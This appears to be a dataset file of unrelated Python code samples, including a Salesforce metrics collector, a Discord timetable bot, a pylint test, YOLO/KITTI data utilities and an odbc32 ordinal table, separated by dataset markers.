#from sklearn.ensemble import RandomForestClassifier
#classifier = RandomForestClassifier(n_estimators=1000, random_state=0)
from sklearn import svm
classifier = svm.SVC()
classifier.fit(X_train, y_train)
'''Now predict on the testing data'''
y_pred = classifier.predict(X_test)
'''Print the evaluation metrices'''
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
print(accuracy_score(y_test, y_pred))
print('FINISHED')
| StarcoderdataPython |
3293981 | from prometheus_client.core import GaugeMetricFamily
from SalesforcePy import client as sfdc_client
from os import environ
import logging
import requests
logging.basicConfig(level=logging.INFO)
class Collector(object):
def __init__(self):
self.salesforce_version = environ["SF_VERSION"]
self.environment = environ.get("ENVIRONMENT") or "local"
self.client = sfdc_client(
username=environ["AUTH_USERNAME"],
password=environ["<PASSWORD>"],
client_id=environ["CONSUMER_ID"],
client_secret=environ["CONSUMER_SECRET"],
login_url=environ["SF_URL"],
version=self.salesforce_version,
timeout="30",
)
def fetch_salesforce_logs(self):
logging.info("Fetching Salesforce access credentials.")
credentials = self.client.login()[0]
if not credentials:
raise ConnectionRefusedError("Incorrect credentials. Please try again....")
headers = {
"Authorization": f"Bearer {credentials['access_token']}",
}
logging.info("Fetching Salesforce logs.")
response = requests.get(
f"{credentials['instance_url']}/services/data/v{self.salesforce_version}/limits",
headers=headers,
)
if response.status_code == 200:
logging.info(f"[{response.status_code}]: Logs fetched successfully.")
return response.json()
else:
raise ConnectionError(f"[{response.status_code}]: {response.text}")
def iterator(self, logs: dict, parent=None):
for key, value in logs.items():
if parent:
metric = f"{parent}".replace(" ", "_").replace(".", "_")
if type(value) == dict:
if parent:
new_parent = f"{parent}_{key}"
else:
new_parent = key
for log in self.iterator(logs=value, parent=new_parent):
yield log
elif key == "Remaining":
c = GaugeMetricFamily(
f"sfdc_remaining_{metric}",
f"{parent or ''} {key}",
labels=["env"],
)
c.add_metric([self.environment], value)
yield c
elif key == "Max":
c = GaugeMetricFamily(
f"sfdc_limit_{metric}",
f"{parent or ''} {key}",
labels=["env"],
)
c.add_metric([self.environment], value)
yield c
def collect(self):
logs = self.fetch_salesforce_logs()
for log in self.iterator(logs=logs):
yield log
| StarcoderdataPython |
152641 | import asyncio
import discord
from discord.ext import commands
import get_link
client = commands.Bot(command_prefix='.') # Sets the prefix to listen.
async def post_tasks(): # background method to send the data extracted in get_link.py
await client.wait_until_ready()
channel = client.get_channel(680655448042504232) # channel ID goes here
while not client.is_closed():
await channel.purge(limit=100)
get_link.get_html() # this calls get_link.py to download the webpage to get the newest information
titel = ['None', 'None', 'Deutsch', 'English', 'Mathe', 'FBE', 'Datenbanken', 'Programmieren', 'FBIN', 'None',
'None', 'Politik', 'Wirtschaft', 'None', 'None'] # list with titels in it
for section in range(2, 14): # goes through every section in get_link.py
text = str(get_link.get_information_main(section)).replace('[', '').replace(']', '').replace("'", '') # calls get_link with section(an int), so that the script knows wich section
if text == None:
test = "Oh nothing found xD"
else:
test = "Footer :D"
message = discord.Embed(
titel = titel[section],
description = text,
colour = discord.Colour.blurple()
)
message.set_footer(text= test)
await channel.send(embed=message)
#await channel.send(str(lists[section])+'\n'+str(get_link.get_information_main(section)).replace('[', '').replace(']', '').replace("'", ''))
await channel.send('@everyone ')
await asyncio.sleep(86400) # task runs every 86400 seconds or better every 24h
@client.event
async def on_ready():
print('Logged in as')
print(client.user.name)
print(client.user.id)
print('------')
@client.command()
async def post(): # Method to manually get the data from get_link.py
channel = client.get_channel(680655448042504232)
lists = ['None', 'None', 'Deutsch', 'English', 'Mathe', 'FBE', 'Datenbanken', 'Programmieren', 'FBIN', 'None',
'None', 'Politik', 'Wirtschaft', 'None', 'None']
for section in range(2, 14):
await channel.send(str(lists[section])+'\n'+str(get_link.get_information_main(section))) #Not sent in an embed remember it
@client.command()
async def vertretungsplan(message): # this method will sends the link below and mentions the author of the request
channel = client.get_channel(680655448042504232)
await channel.send('https://webuntis.krzn.de/WebUntis/monitor?school=bk-technik-moers&monitorType'
'=subst&format=Schulflur' + '{0.author.mention}'.format(message))
@client.command()
async def clear(ctx): # Method to manually clear the channel
channel = client.get_channel(680655448042504232)
await channel.purge(limit=100)
client.loop.create_task(post_tasks())
client.run('')
| StarcoderdataPython |
4816400 | <reponame>mami-project/lurk
"""Check unpacking non-sequences in assignments. """
# pylint: disable=too-few-public-methods, invalid-name, attribute-defined-outside-init, unused-variable, no-absolute-import
from os import rename as nonseq_func
from functional.unpacking import nonseq
__revision__ = 0
# Working
class Seq(object):
""" sequence """
def __init__(self):
self.items = list(range(2))
def __getitem__(self, item):
return self.items[item]
def __len__(self):
return len(self.items)
class Iter(object):
""" Iterator """
def __iter__(self):
for number in range(2):
yield number
def good_unpacking():
""" returns should be unpackable """
if True:
return [1, 2]
else:
return (3, 4)
def good_unpacking2():
""" returns should be unpackable """
return good_unpacking()
a, b = [1, 2]
a, b = (1, 2)
a, b = set([1, 2])
a, b = {1: 2, 2: 3}
a, b = "xy"
a, b = Seq()
a, b = Iter()
a, b = (number for number in range(2))
a, b = good_unpacking()
a, b = good_unpacking2()
# Not working
class NonSeq(object):
""" does nothing """
def bad_unpacking():
""" one return isn't unpackable """
if True:
return None
return [1, 2]
a, b = NonSeq() # [unpacking-non-sequence]
a, b = ValueError # [unpacking-non-sequence]
a, b = None # [unpacking-non-sequence]
a, b = 1 # [unpacking-non-sequence]
a, b = nonseq # [unpacking-non-sequence]
a, b = nonseq() # [unpacking-non-sequence]
a, b = bad_unpacking() # [unpacking-non-sequence]
a, b = nonseq_func # [unpacking-non-sequence]
class ClassUnpacking(object):
""" Check unpacking as instance attributes. """
def test(self):
""" test unpacking in instance attributes. """
self.a, self.b = 1, 2
self.a, self.b = {1: 2, 2: 3}
self.a, self.b = "xy"
self.a, c = "xy"
c, self.a = good_unpacking()
self.a, self.b = Iter()
self.a, self.b = NonSeq() # [unpacking-non-sequence]
self.a, self.b = ValueError # [unpacking-non-sequence]
self.a, self.b = bad_unpacking() # [unpacking-non-sequence]
self.a, c = nonseq_func # [unpacking-non-sequence]
| StarcoderdataPython |
1646706 | #
# Licensed to Big Data Genomics (BDG) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The BDG licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from setuptools import find_packages, setup
from version import version as mango_version
try: # for pip >= 10
from pip._internal.req import parse_requirements
except ImportError: # for pip <= 9.0.3
from pip.req import parse_requirements
import os
# Utility function to read the README file.
# Used for the long_description.
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
# parse_requirements() returns generator of pip.req.InstallRequirement objects
install_reqs = parse_requirements('requirements.txt', session='hack')
reqs = [str(ir.req) for ir in install_reqs]
setup(
name='bdgenomics.mango',
version=mango_version,
description='A scalable genomic visualization tool',
author='<NAME>',
author_email='<EMAIL>',
url="https://github.com/bdgenomics/mango",
install_requires=reqs,
dependency_links=[
'https://test.pypi.org/simple/bdgenomics-adam/'
],
long_description=read('README.md'),
packages=find_packages(exclude=['*.test.*']))
| StarcoderdataPython |
3329568 | <filename>Raspberry/old/server/old/sendSck.py
import socket, time
IPADDR = '192.168.0.192'
PORTNUM = 5000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.getprotobyname('udp'))
addr = (IPADDR, PORTNUM)
#s.connect(addr)
while True:
print "Enviado 5 a ",addr
s.sendto(chr(5),addr)
time.sleep(1)
s.close()
| StarcoderdataPython |
149530 | <filename>o/odbc32.py
# md5 : b27c56d844ab064547d40bf4f0a96eae
# sha1 : c314e447018b0d8711347ee26a5795480837b2d3
# sha256 : c045615fe1b44a6409610e4e94e70f1559325eb55ab1f805b0452e852771c0ae
ord_names = {
1: b'SQLAllocConnect',
2: b'SQLAllocEnv',
3: b'SQLAllocStmt',
4: b'SQLBindCol',
5: b'SQLCancel',
6: b'SQLColAttributes',
7: b'SQLConnect',
8: b'SQLDescribeCol',
9: b'SQLDisconnect',
10: b'SQLError',
11: b'SQLExecDirect',
12: b'SQLExecute',
13: b'SQLFetch',
14: b'SQLFreeConnect',
15: b'SQLFreeEnv',
16: b'SQLFreeStmt',
17: b'SQLGetCursorName',
18: b'SQLNumResultCols',
19: b'SQLPrepare',
20: b'SQLRowCount',
21: b'SQLSetCursorName',
22: b'SQLSetParam',
23: b'SQLTransact',
24: b'SQLAllocHandle',
25: b'SQLBindParam',
26: b'SQLCloseCursor',
27: b'SQLColAttribute',
28: b'SQLCopyDesc',
29: b'SQLEndTran',
30: b'SQLFetchScroll',
31: b'SQLFreeHandle',
32: b'SQLGetConnectAttr',
33: b'SQLGetDescField',
34: b'SQLGetDescRec',
35: b'SQLGetDiagField',
36: b'SQLGetDiagRec',
37: b'SQLGetEnvAttr',
38: b'SQLGetStmtAttr',
39: b'SQLSetConnectAttr',
40: b'SQLColumns',
41: b'SQLDriverConnect',
42: b'SQLGetConnectOption',
43: b'SQLGetData',
44: b'SQLGetFunctions',
45: b'SQLGetInfo',
46: b'SQLGetStmtOption',
47: b'SQLGetTypeInfo',
48: b'SQLParamData',
49: b'SQLPutData',
50: b'SQLSetConnectOption',
51: b'SQLSetStmtOption',
52: b'SQLSpecialColumns',
53: b'SQLStatistics',
54: b'SQLTables',
55: b'SQLBrowseConnect',
56: b'SQLColumnPrivileges',
57: b'SQLDataSources',
58: b'SQLDescribeParam',
59: b'SQLExtendedFetch',
60: b'SQLForeignKeys',
61: b'SQLMoreResults',
62: b'SQLNativeSql',
63: b'SQLNumParams',
64: b'SQLParamOptions',
65: b'SQLPrimaryKeys',
66: b'SQLProcedureColumns',
67: b'SQLProcedures',
68: b'SQLSetPos',
69: b'SQLSetScrollOptions',
70: b'SQLTablePrivileges',
71: b'SQLDrivers',
72: b'SQLBindParameter',
73: b'SQLSetDescField',
74: b'SQLSetDescRec',
75: b'SQLSetEnvAttr',
76: b'SQLSetStmtAttr',
77: b'SQLAllocHandleStd',
78: b'SQLBulkOperations',
79: b'CloseODBCPerfData',
80: b'CollectODBCPerfData',
81: b'CursorLibLockDbc',
82: b'CursorLibLockDesc',
83: b'CursorLibLockStmt',
84: b'ODBCGetTryWaitValue',
85: b'CursorLibTransact',
86: b'ODBCSetTryWaitValue',
87: b'DllBidEntryPoint',
88: b'GetODBCSharedData',
89: b'LockHandle',
90: b'ODBCInternalConnectW',
91: b'OpenODBCPerfData',
92: b'PostComponentError',
93: b'PostODBCComponentError',
94: b'PostODBCError',
95: b'SQLCancelHandle',
96: b'SQLCompleteAsync',
97: b'SearchStatusCode',
98: b'VFreeErrors',
99: b'VRetrieveDriverErrorsRowCol',
100: b'ValidateErrorQueue',
101: b'g_hHeapMalloc',
106: b'SQLColAttributesW',
107: b'SQLConnectW',
108: b'SQLDescribeColW',
110: b'SQLErrorW',
111: b'SQLExecDirectW',
117: b'SQLGetCursorNameW',
119: b'SQLPrepareW',
121: b'SQLSetCursorNameW',
127: b'SQLColAttributeW',
132: b'SQLGetConnectAttrW',
133: b'SQLGetDescFieldW',
134: b'SQLGetDescRecW',
135: b'SQLGetDiagFieldW',
136: b'SQLGetDiagRecW',
138: b'SQLGetStmtAttrW',
139: b'SQLSetConnectAttrW',
140: b'SQLColumnsW',
141: b'SQLDriverConnectW',
142: b'SQLGetConnectOptionW',
145: b'SQLGetInfoW',
147: b'SQLGetTypeInfoW',
150: b'SQLSetConnectOptionW',
152: b'SQLSpecialColumnsW',
153: b'SQLStatisticsW',
154: b'SQLTablesW',
155: b'SQLBrowseConnectW',
156: b'SQLColumnPrivilegesW',
157: b'SQLDataSourcesW',
160: b'SQLForeignKeysW',
162: b'SQLNativeSqlW',
165: b'SQLPrimaryKeysW',
166: b'SQLProcedureColumnsW',
167: b'SQLProceduresW',
170: b'SQLTablePrivilegesW',
171: b'SQLDriversW',
173: b'SQLSetDescFieldW',
176: b'SQLSetStmtAttrW',
206: b'SQLColAttributesA',
207: b'SQLConnectA',
208: b'SQLDescribeColA',
210: b'SQLErrorA',
211: b'SQLExecDirectA',
217: b'SQLGetCursorNameA',
219: b'SQLPrepareA',
221: b'SQLSetCursorNameA',
227: b'SQLColAttributeA',
232: b'SQLGetConnectAttrA',
233: b'SQLGetDescFieldA',
234: b'SQLGetDescRecA',
235: b'SQLGetDiagFieldA',
236: b'SQLGetDiagRecA',
238: b'SQLGetStmtAttrA',
239: b'SQLSetConnectAttrA',
240: b'SQLColumnsA',
241: b'SQLDriverConnectA',
242: b'SQLGetConnectOptionA',
245: b'SQLGetInfoA',
247: b'SQLGetTypeInfoA',
250: b'SQLSetConnectOptionA',
252: b'SQLSpecialColumnsA',
253: b'SQLStatisticsA',
254: b'SQLTablesA',
255: b'SQLBrowseConnectA',
256: b'SQLColumnPrivilegesA',
257: b'SQLDataSourcesA',
260: b'SQLForeignKeysA',
262: b'SQLNativeSqlA',
265: b'SQLPrimaryKeysA',
266: b'SQLProcedureColumnsA',
267: b'SQLProceduresA',
270: b'SQLTablePrivilegesA',
271: b'SQLDriversA',
273: b'SQLSetDescFieldA',
276: b'SQLSetStmtAttrA',
301: b'ODBCQualifyFileDSNW',
} | StarcoderdataPython |
3247419 | from abc import ABC, abstractmethod
import subprocess
import semver
import requests
import container_builder.src.exceptions as exceptions
# Resolution strategies come in after a build has completed with various ways to determine
# when a pushable change has occured
class Strategy(ABC):
def __init__(self, repo):
self.repo = repo
@abstractmethod
def execute(self, cont, **kwargs):
pass
@classmethod
def validate_config(self, config, schema):
new_conf = {}
conf_keys = config.keys()
for k, v in schema.items():
if v["required"] and k not in conf_keys:
raise exceptions.ConfigException(f"Config missing {k}")
elif "default" in v.keys() and k not in conf_keys:
new_conf[k] = v["default"]
elif k in conf_keys:
new_conf[k] = config[k]
return new_conf
class MockStrat(Strategy):
def __init__(self, repo):
super().__init__(repo)
def execute(self, cont, **kwargs):
pass
class BlindBuild(Strategy):
SCHEMA = {}
def __init__(self, repo):
super().__init__(repo)
def execute(self, cont, **kwargs):
build = kwargs["build"]
config = kwargs["config"]
build.run(
cont,
config,
tag=f"{config['repo']}:latest",
build_repo=None,
latest=True,
)
class Branch(Strategy):
SCHEMA = {"branch": {"required": True}}
def __init__(self, repo):
super().__init__(repo)
def execute(self, cont, **kwargs):
build = kwargs["build"]
config = kwargs["config"]
self.repo.set_branch(config["strategy"]["args"]["branch"])
build.run(
cont,
config,
tag=f"{config['repo']}:latest",
build_repo=self.repo.path,
latest=True,
)
class Tag(Strategy):
SCHEMA = {
"force_semver": {"required": False, "default": False},
"replace_text": {"required": False},
"tag_prefix": {"required": False},
"version": {"required": True},
}
def __init__(self, repo):
super().__init__(repo)
# docker container repo
def get_remote_repo_tags(self, repo):
repo = repo.split("/")
repo_domain = repo[0]
del repo[0]
repo = "/".join(repo)
try:
req = requests.get(f"https://{repo_domain}/v2/{repo}/tags/list")
except requests.RequestException as error:
raise StrategyException(f"Error grabbing remote repo tags {error}")
# deal with betas etc.
# add in master/main/latest support
tags = sorted(
[
semver.VersionInfo.parse(x.strip("v"))
for x in req.json()["tags"]
if x != "latest"
],
reverse=True,
)
return tags
def get_local_repo_tags(self, replace_text, force_semver, tag_prefix):
output = subprocess.run(
"git tag",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=self.repo.path,
)
if output.returncode != 0:
raise exceptions.StrategyException(
f"Something went wrong with listing tags {output.stdout}"
)
tags = []
for tag in str(output.stdout).strip("b'").split("\\n"):
tag = tag.strip(tag_prefix)
if replace_text:
tag = tag.replace(replace_text["match"], replace_text["replacement"])
# force semver format
if force_semver and len(tag.split(".")) < 3:
tag += ".0"
try:
tags.append(semver.VersionInfo.parse(tag))
# assume there are some nonsense tags and just throw them away
except ValueError:
continue
return sorted(tags, reverse=True)
def execute(self, cont, **kwargs):
build = kwargs["build"]
config = kwargs["config"]
if "replace_text" in config["strategy"]["args"].keys():
replace_text = config["strategy"]["args"]["replace_text"]
else:
replace_text = None
if "force_semver" in config["strategy"]["args"].keys():
force_semver = config["strategy"]["args"]["force_semver"]
else:
force_semver = None
if "tag_prefix" in config["strategy"]["args"].keys():
tag_prefix = config["strategy"]["args"]["tag_prefix"]
else:
force_semver = "v"
rmt_tags = set(self.get_remote_repo_tags(config["repo"]))
lcl_tags = set(self.get_local_repo_tags(replace_text, force_semver, tag_prefix))
tag_diff = sorted(lcl_tags.difference(rmt_tags), reverse=True)
for vsn_tag in tag_diff:
if vsn_tag >= semver.VersionInfo.parse(
config["strategy"]["args"]["version"]
):
if replace_text:
repo_tag = str(vsn_tag).replace(
replace_text["replacement"], replace_text["match"]
)
else:
repo_tag = vsn_tag
if force_semver:
repo_tag = repo_tag.strip(f'{replace_text["match"]}0')
self.repo.set_branch(f"{tag_prefix}{repo_tag}")
if list(tag_diff).index(vsn_tag) == 0:
build.run(
cont,
config,
tag=f"{config['repo']}:{vsn_tag}",
build_repo=self.repo.path,
latest=True,
)
else:
build.run(
cont,
config,
tag=f"{config['repo']}:{vsn_tag}",
build_repo=self.repo.path,
latest=False,
)
# extra references for config file
track_branch = Branch
track_tag = Tag
blind_build = BlindBuild
| StarcoderdataPython |
1724750 | # -*- coding: utf-8 -*-
"""
Created on Fri Nov 17 13:30:25 2017
@author: similarities
"""
import numpy as np
import Tkinter, tkFileDialog
import ntpath
import matplotlib.pyplot as plt
root = Tkinter.Tk()
root.withdraw()
ntpath.basename("a/b/c")
file_path = tkFileDialog.askopenfilename()
#open(file_path)
def path_leaf(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
print(path_leaf(file_path))
class Max_Min:
def __init__(self, file_path):
self.file_path = file_path
self.array_min = np.empty([1, 2])
self.array_max = np.empty([1, 2])
self.raw_data = np.array
def loadarray(self):
#reads coloumn1 from txt / skips first rows (3),
liste1 = np.loadtxt(self.file_path, skiprows = (3), usecols = (0,))
#reads coloumn2 from txt / skips first rows (3),
liste = np.loadtxt(self.file_path, skiprows = (3), usecols = (1,))
#converts loaded coloumn1 to an numpy array:
matrix1 = np.array((liste1))
#converts loaded coloumn2 to an numpy array:
aa = np.array((liste))
#joins the arrays into a 2xN array
self.raw_data = np.column_stack((matrix1, aa))
self.raw_data.view('i8,i8').sort(order = ['f0'], axis = 0)
#print submatrix1
plot_xy(self.raw_data, "b", "rawdata")
return self.raw_data
def peak_detect(self):
i = 1
N = len(self.raw_data)
#peak_min = np.empty([1, 2])
peak = np.empty([1, 2])
#peak_max = np.empty([1, 2])
while i < N-1:
delta_1 = self.raw_data[i+1, 1]-self.raw_data[i, 1]
delta_2 = self.raw_data[i-1, 1]-self.raw_data[i, 1]
if delta_1 < 0 and delta_2 > 0:
None
elif delta_1 > 0 and delta_2 < 0:
None
elif delta_1 < 0 and delta_2 < 0:
#make new array and mark points
peak[0, 0] = self.raw_data[i, 0]
peak[0, 1] = self.raw_data[i, 1]
self.array_min= np.concatenate((peak,self.array_min))
elif delta_1 > 0 and delta_2 > 0:
#make new array and mark points
peak[0, 0] = self.raw_data[i, 0]
peak[0, 1] = self.raw_data[i, 1]
self.array_max = np.concatenate((peak, self.array_max))
else:
print "equal?", delta_1, delta_2
i=i+1
# info:
print "number of raw data points:", len(self.raw_data)
print "number of maxima:", len(self.array_max)
print "number of minima:", len(self.array_min)
plot_xy(self.array_max, "r", "max" )
plot_xy(self.array_min, "y", "min")
print_to_file(self.array_min, "picked_Minimum")
print_to_file(self.array_max, "picked_Maximum")
return self.array_max, self.array_min
# global functions:
def plot_xy(array, color, name):
x = array[:,0]
y = array[:,1]
plot=plt.scatter(x, y, color = color,label = name)
plt.legend(handles = [plot])
plt.ylabel(name)
plt.show()
def print_to_file(array,name):
print "now to file"
np.savetxt("test" + "_" + name + ".txt", array[:], fmt = '%.3E', delimiter = '\t')
return array
my_filter = Max_Min(file_path)
my_filter.loadarray()
# including the plot and print call here -- might be done in a nicer way outside
my_filter.peak_detect()
| StarcoderdataPython |
3335829 | from hangups.hangouts_pb2 import Location as HangupsLocation, ItemType
from hangups.hangouts_pb2 import Place, EmbedItem
import hangups
from hanger.abc import HangupsObject
class Location(HangupsObject):
def __init__(self, name, address, latitude, longitude, url=None, image_url=None):
self.name = name
self.address = address
self.longitude = longitude
self.latitude = latitude
self.url = url
self.image_url = image_url
def _build_hangups_object(self):
return HangupsLocation(
place=Place(
url=self.url,
name=self.name,
address=EmbedItem(
postal_address=hangups.hangouts_pb2.EmbedItem.PostalAddress(
street_address=self.address
)
),
geo=EmbedItem(
geo_coordinates=hangups.hangouts_pb2.EmbedItem.GeoCoordinates(
latitude=self.latitude,
longitude=self.longitude
)
),
representative_image=EmbedItem(
image=hangups.hangouts_pb2.EmbedItem.Image(
url=self.image_url
)
)
)
)
| StarcoderdataPython |
1779970 | """Miscellaneous utility functions."""
from functools import reduce
import cv2, os
from PIL import Image
import numpy as np
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
def compose(*funcs):
"""Compose arbitrarily many functions, evaluated left to right.
Reference: https://mathieularose.com/function-composition-in-python/
"""
# return lambda x: reduce(lambda v, f: f(v), funcs, x)
if funcs:
return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
else:
raise ValueError('Composition of empty sequence not supported.')
def letterbox_image(image, size):
'''resize image with unchanged aspect ratio using padding'''
iw, ih = image.size
w, h = size
scale = min(w*1.0/iw, h*1.0/ih)
nw = int(iw*scale)
nh = int(ih*scale)
print ('w %d h %d iw %d ih %d nw %d nh %d scale %f'%(w, h, iw, ih, nw, nh, scale))
image = image.resize((nw,nh), Image.BICUBIC)
new_image = Image.new('RGB', size, (128,128,128))
new_image.paste(image, ((w-nw)//2, (h-nh)//2))
# image = image.resize(size, Image.BICUBIC)
new_image.show()
return new_image
def rand(a=0, b=1):
return np.random.rand()*(b-a) + a
VEHICLES = ['Car', 'Truck', 'Van', 'Tram','Pedestrian','Cyclist']
VEHICLESNUM = [0, 1, 2, 3, 4, 5]
BIN, OVERLAP = 2, 0.1
def compute_anchors(angle):
anchors = []
wedge = 2.*np.pi/BIN
l_index = int(angle/wedge)
r_index = l_index + 1
if (angle - l_index*wedge) < wedge/2 * (1+OVERLAP/2):
anchors.append([l_index, angle - l_index*wedge])
if (r_index*wedge - angle) < wedge/2 * (1+OVERLAP/2):
anchors.append([r_index%BIN, angle - r_index*wedge])
return anchors
def kitti_parse_annotation(label_dir, image_dir):
image_num = 0
all_image_objs = []
dims_avg = {key:np.array([0, 0, 0]) for key in VEHICLESNUM}
dims_cnt = {key:0 for key in VEHICLESNUM}
for label_file in sorted(os.listdir(label_dir)):
all_objs = []
image_file = label_file.replace('txt', 'png')
for line in open(label_dir + label_file).readlines():
line = line.strip().split(' ')
truncated = np.abs(float(line[1]))
occluded = np.abs(float(line[2]))
if line[0] in VEHICLES:
#and truncated < 0.6 and occluded < 0.6:
new_alpha = float(line[3]) + np.pi/2.
if new_alpha < 0:
new_alpha = new_alpha + 2.*np.pi
# if line[0]=='Pedestrian' or line[0]=='Cyclist':#mod only car orient
# new_alpha = 0.0
new_alpha = new_alpha - int(new_alpha/(2.*np.pi))*(2.*np.pi)
# if line[0]=='Pedestrian' or line[0]=='Cyclist':#mod only car orient
# new_alpha = 0.0
obj = {'name': VEHICLES.index(line[0]),
'image':image_dir+image_file,
'xmin':int(float(line[4])),
'ymin':int(float(line[5])),
'xmax':int(float(line[6])),
'ymax':int(float(line[7])),
'dims':np.array([float(number) for number in line[8:11]]),
'new_alpha': new_alpha
}
dims_avg[obj['name']] = dims_cnt[obj['name']]*dims_avg[obj['name']] + obj['dims']
dims_cnt[obj['name']] += 1
dims_avg[obj['name']] /= dims_cnt[obj['name']]
all_objs.append(obj)
#print("objs len %d", len(all_objs))
#print(all_objs)
if len(all_objs)== 0:
continue
#print(all_objs)
all_image_objs.append(all_objs)
#all_objs.clear()
image_num += 1
#print(all_image_objs)
###### flip data
for image_objs in all_image_objs:
#print(len(image_objs))
for obj in image_objs:
# Fix dimensions
obj['dims'] = obj['dims'] - dims_avg[obj['name']]
# Fix orientation and confidence for no flip
orientation = np.zeros((BIN,2))
confidence = np.zeros(BIN)
anchors = compute_anchors(obj['new_alpha'])
for anchor in anchors:
orientation[anchor[0]] = np.array([np.cos(anchor[1]), np.sin(anchor[1])])
confidence[anchor[0]] = 1.
confidence = confidence / np.sum(confidence)
obj['orient'] = orientation
obj['conf'] = confidence
# Fix orientation and confidence for flip
orientation = np.zeros((BIN,2))
confidence = np.zeros(BIN)
anchors = compute_anchors(2.*np.pi - obj['new_alpha'])
for anchor in anchors:
orientation[anchor[0]] = np.array([np.cos(anchor[1]), np.sin(anchor[1])])
confidence[anchor[0]] = 1
confidence = confidence / np.sum(confidence)
obj['orient_flipped'] = orientation
obj['conf_flipped'] = confidence
return all_image_objs
def get_random_data(image_objs, input_shape, random=True, max_boxes=100, jitter=.2, hue=.1, sat=1.5, val=1.5, proc_img=True):
'''random preprocessing for real-time data augmentation'''
obj_cnt = 0
h, w = input_shape
#box = np.array([np.array(list(map(int,box.split(',')))) for box in line[1:]])
# box 4 cls 1 dim 3 orient BIN*2 confidence BIN
box = np.zeros((len(image_objs), 5+3+BIN*2+BIN))
torient = np.zeros((len(image_objs), (2+1)*2*BIN))
#print(len(image_objs))
#print(image_objs)
for obj in image_objs:
if obj_cnt == 0:
image = Image.open(obj['image'])
picname = obj['image'][-10:]
iw, ih = image.size
box[obj_cnt, 0] = obj['xmin']
box[obj_cnt, 1] = obj['ymin']
box[obj_cnt, 2] = obj['xmax']
box[obj_cnt, 3] = obj['ymax']
box[obj_cnt, 4] = int(obj['name'])
box[obj_cnt, 5:8] = obj['dims'][0:3]
# box[obj_cnt, 5] = obj['dims'][0] - dims_avg[obj['name']][0]
# box[obj_cnt, 6] = obj['dims'][1] - dims_avg[obj['name']][1]
# box[obj_cnt, 7] = obj['dims'][2] - dims_avg[obj['name']][2]
for bini in range(BIN):
torient[obj_cnt, bini] = obj['conf'][bini]
torient[obj_cnt, BIN+bini*2] = obj['orient'][bini][0]
torient[obj_cnt, BIN+bini*2+1] = obj['orient'][bini][1]
torient[obj_cnt, BIN*3+bini] = obj['conf_flipped'][bini]
torient[obj_cnt, BIN*4+bini*2] = obj['orient_flipped'][bini][0]
torient[obj_cnt, BIN*4+bini*2+1] = obj['orient_flipped'][bini][1]
obj_cnt += 1
#print(box)
if not random:
# resize image
scale = min(w/iw, h/ih)
nw = int(iw*scale)
nh = int(ih*scale)
dx = (w-nw)//2
dy = (h-nh)//2
image_data=0
if proc_img:
image = image.resize((nw,nh), Image.BICUBIC)
new_image = Image.new('RGB', (w,h), (128,128,128))
new_image.paste(image, (dx, dy))
image_data = np.array(new_image)/255.
# correct boxes
box_data = np.zeros((max_boxes,5+(2+1)*BIN+3))
if len(box)>0:
box[:, 8:] = torient[:, :BIN*3]
np.random.shuffle(box)
if len(box)>max_boxes: box = box[:max_boxes]
box[:, [0,2]] = box[:, [0,2]]*scale + dx
box[:, [1,3]] = box[:, [1,3]]*scale + dy
box_data[:len(box)] = box
return image_data, box_data
# resize image
#print('w %d h %d', iw, ih)
new_ar = w/h * rand(1-jitter,1+jitter)/rand(1-jitter,1+jitter)
scale = rand(.8, 1.2)
if new_ar < 1:
nh = int(scale*h)
nw = int(nh*new_ar)
else:
nw = int(scale*w)
nh = int(nw/new_ar)
image = image.resize((nw,nh), Image.BICUBIC)
# place image
dx = int(rand(0, w-nw))
dy = int(rand(0, h-nh))
new_image = Image.new('RGB', (w,h), (128,128,128))
new_image.paste(image, (dx, dy))
image = new_image
# flip image or not
flip = rand()<.5
if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)
# distort image
hue = rand(-hue, hue)
sat = rand(1, sat) if rand()<.5 else 1/rand(1, sat)
val = rand(1, val) if rand()<.5 else 1/rand(1, val)
x = rgb_to_hsv(np.array(image)/255.)
x[..., 0] += hue
x[..., 0][x[..., 0]>1] -= 1
x[..., 0][x[..., 0]<0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x>1] = 1
x[x<0] = 0
image_data = hsv_to_rgb(x) # numpy array, 0 to 1
# correct boxes
box_data = np.zeros((max_boxes,5+(2+1)*BIN+3))
if len(box)>0:
box[:, [0,2]] = box[:, [0,2]]*nw/iw + dx
box[:, [1,3]] = box[:, [1,3]]*nh/ih + dy
if flip:
box[:, [0,2]] = w - box[:, [2,0]]
box[:, 8:] = torient[:, BIN*3:]
else:
box[:, 8:] = torient[:, :BIN*3]
box[:, 0:2][box[:, 0:2]<0] = 0
box[:, 2][box[:, 2]>w] = w
box[:, 3][box[:, 3]>h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w>1, box_h>1)] # discard invalid box
if len(box)>max_boxes: box = box[:max_boxes]
np.random.shuffle(box)
box_data[:len(box)] = box
return image, image_data, box_data, picname
| StarcoderdataPython |
1771294 | #!/usr/bin/env python
import h5py
import numpy as np
ltype = "chain"
L = 6
filename="alpsraw/spectra.{}.{}.task1.out.h5".format(ltype, L)
spectrum = []
with h5py.File(filename, "r") as f:
for key in f["spectrum"]["sectors"].keys():
sector = f["spectrum"]["sectors"][key]
spectrum += list(sector["energies"][:])
print(sector["energies"][:])
spectrum.sort()
np.savetxt("spectrum.{}.{}.txt".format(ltype, L), np.array(spectrum))
| StarcoderdataPython |
3209557 | <reponame>castvoid/type-safely<gh_stars>0
from google.protobuf.message import Message
